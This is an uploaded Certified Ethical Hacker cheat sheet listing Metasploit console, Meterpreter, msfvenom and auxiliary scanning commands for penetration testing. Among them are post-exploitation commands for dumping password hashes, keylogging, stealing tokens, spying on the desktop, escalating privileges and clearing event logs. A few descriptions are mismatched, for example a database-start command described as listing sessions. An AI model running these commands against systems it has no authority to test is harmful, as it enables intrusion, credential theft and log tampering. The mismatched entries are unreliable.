Metasploit-Cheat-Sheet 2024

Uploaded by

onlyroughpurpose

Ethical Hacking and Countermeasures

Certified Ethical Hacker

Metasploit Cheat Sheet

Metasploit

Metasploit is an open-source project that provides the infrastructure, content, and tools to perform penetration tests and extensive security auditing. It is a tool that provides information about security vulnerabilities and aids in penetration testing. The Metasploit framework is also used for developing and executing exploits, which helps in gaining remote access to a system by exploiting any vulnerability present in that server. Meterpreter is a payload inside the framework.

Source: https://www.metasploit.com

The following table lists the various Metasploit commands and their respective scanning methods.

Contents

1. Metasploit General Information
2. Executing an Exploit / Scanner / Module
3. Session Handling
4. Using Database
   i. First Time Setup (Linux command line)
   ii. Inside msfconsole Syntax
5. Meterpreter Session Commands
   i. Base Commands
   ii. Process Commands
   iii. File System Commands
   iv. Escalate Privileges
   v. Networking Commands
   vi. Additional Commands
6. Session Management
7. Interface / Output Commands
8. Msfvenom Command Options
9. Important Auxiliary Modules

1. Metasploit General Information

Metasploit Command                 Description
msfconsole                         Launch program
version                            Display current version
msfupdate                          Pull weekly update
makerc <FILE.rc>                   Saves recent commands to file
msfconsole -r <FILE.rc>            Loads resource file

2. Executing an Exploit / Scanner / Module

Metasploit Command                 Description
use <MODULE>                       Set the exploit to use
set payload <PAYLOAD>              Set the payload
show options                       Show all options
set <OPTION> <SETTING>             Set setting
exploit or run                     Execute exploit

3. Session Handling

Metasploit Command                 Description
sessions -l                        List all sessions
sessions -i <ID>                   Interact to session
background or ^Z                   Detach from session

4. Using Database

i. First Time Setup (Linux command line)

Metasploit Command                 Description
service postgresql start           List all sessions
msfdb init                         Init database

ii. Inside msfconsole

Metasploit Command                 Description
db_status                          Should display connected
hosts                              Display hosts in database
services                           Show ports in database
vulns                              Exhibit all vulnerabilities

5. Meterpreter Session Commands

i. Base Commands

Metasploit Command                 Description
sysinfo                            Display system name and OS type
shutdown / reboot                  Shutdown system
exit / quit                        Exit Meterpreter session

ii. Process Commands

Metasploit Command                 Description
ps                                 Show running processes list
kill <PID>                         Terminate process
getuid                             Show user ID
getpid                             Show process ID that Meterpreter is running inside
migrate <PID>                      Start another process
execute                            Execute given program with the privileges of the process

iii. File System Commands

Metasploit Command                 Description
pwd / lpwd / getwd                 Display current working directory (local / remote)
cd                                 Change directory
lcd                                Change directory (local)
mkdir                              Make directory
rmdir                              Remove directory
cat                                Show contents of a file
edit <FILE>                        Edit a file in default editor (vi)
upload / download                  Upload / download a file from target machine

iv. Escalate Privileges

Metasploit Command                 Description
use priv                           Load script
getsystem                          Gain administrative-level privileges
getprivs                           Elevate privileges

v. Networking Commands

Metasploit Command                 Description
ipconfig                           Show network interface information
route                              Manage/view the system's routing table
C                                  Forward packets through TCP session
route add <Target IP/Subnet>       Pivot through session by adding route in MSF
route add <Target IP/Subnet> -d    Delete route inside MSF
sniffer                            Allow network sniffing interaction commands
portfwd                            Port forwarding connections
portfwd -L                         Local host to listen
portfwd -l                         Local port to listen
portfwd -p                         Remote port to connect
portfwd -r                         Remote host to connect

www.eccouncil.org/ceh Over 50% Of Professionals Received Promotions after C|EH


vi. Additional Commands

Metasploit Command                 Description
shell                              Drop into a shell on the target machine
hashdump                           Show all password hashes in Windows
idletime                           Display idle time of the machine
screenshot                         Save the screenshot
clearev                            Clear the logs
uictl [enable/disable]             Enable or disable the mouse or keyboard of the machine
  [keyboard/mouse]
use                                Extension load
channel                            Display active channel
reg                                Access machine registry
steal_token                        Attempts to steal impersonation token from target
espia                              Desktop spying by screenshots
incognito                          Impersonation commands

6. Session Management

Metasploit Command                 Description
msf > exploit -z                   Run exploit in background expecting one session
msf > sessions -i [SessionID]      Interact with backgrounded session
msf > exploit -j                   Run exploit in background expecting one or more sessions
msf > sessions -l                  List all backgrounded sessions
msf > jobs -l                      List all current jobs
msf > jobs -k [JobID]              Kills job
meterpreter > <Ctrl+Z> /           Background current interactive session
meterpreter > background

7. Interface / Output Commands

Metasploit Command                 Description
enumdesktops                       Display all existing desktops
getdesktop                         Display current desktop
keyscan_start                      Start keylogger in target machine
keyscan_stop                       Stop keylogger in target machine
set_desktop                        Configure desktop
keyscan_dump                       Dump keylogger content

8. Msfvenom Command Options

Metasploit Command                 Description
-p (Payload option)                Show payload standard options
-l (list type)                     List module type
-f (format)                        Output format
-e (encoder)                       Define which encoder to use
-a (Architecture or platform)      Define which platform to use
-s (Space)                         Define maximum payload capacity
-b (characters)                    Define set of characters not to use
-i (Number of times)               Define number of times to use encoder
-x (File name)                     Define a custom file to use as template
-o (output)                        Save payload
-h                                 Help

msf > search                       Search for any module
msf > use exploit                  Specify an exploit to use

9. Important Auxiliary Modules

Metasploit Command                                      Description

msf > use auxiliary/scanner/portscan/tcp                Port scanning module
msf > set RHOSTS <Target IP/Subnet>
msf > set PORTS 1-1000
msf > run

msf > use auxiliary/gather/dns_enum                     DNS Enumeration module
msf > set DOMAIN target.tgt
msf > run

msf > use auxiliary/server/ftp                          FTP Server module
msf > set FTPROOT /tmp/ftproot
msf > run

msf > use auxiliary/server/socks4                       Proxy Server module
msf > run

msf > use auxiliary/scanner/snmp/snmp_enum              SNMP Enumeration module
msf > set RHOSTS <Target IP>
msf > exploit

msf > use auxiliary/scanner/sip/enumerator              SIP Enumeration module
msf > set RHOSTS <Target IP/Subnet>
msf > run

msf > use auxiliary/scanner/ftp/ftp_version             FTP Enumeration module
msf > set RHOSTS <Target IP>
msf > exploit

msf > use auxiliary/scanner/discovery/arp_sweep         ARP Sweep module
msf > set RHOSTS <Target IP-Range>
msf > set SHOSTS <Target IP>
msf > set SMAC <MAC Address>
msf > set THREADS <Number of concurrent threads>
msf > run

msf > use auxiliary/scanner/discovery/ipv6_neighbor     IPV6 Neighbor module
msf > set RHOSTS <Target IP-Range>
msf > set SHOSTS <Target IP>
msf > set SMAC <MAC Address>
msf > set THREADS <Number of concurrent threads>
msf > run

msf > use auxiliary/scanner/discovery/udp_probe         UDP Probe module
msf > set RHOSTS <Target IP-Range>
msf > set THREADS <Number of concurrent threads>
msf > run

msf > use auxiliary/scanner/discovery/udp_sweep         UDP Sweep module
msf > set RHOSTS <Target IP-Range>
msf > set THREADS <Number of concurrent threads>
msf > run

msf > use auxiliary/scanner/scada/modbus_findunitid     Scan and detect Modbus Slaves
msf > set RHOSTS <Target IP>
msf > run

msf > use x86/opty2                                     Generates a NOP sled of a given length
msf nop(opty2) > generate -h
Usage: generate [options] length
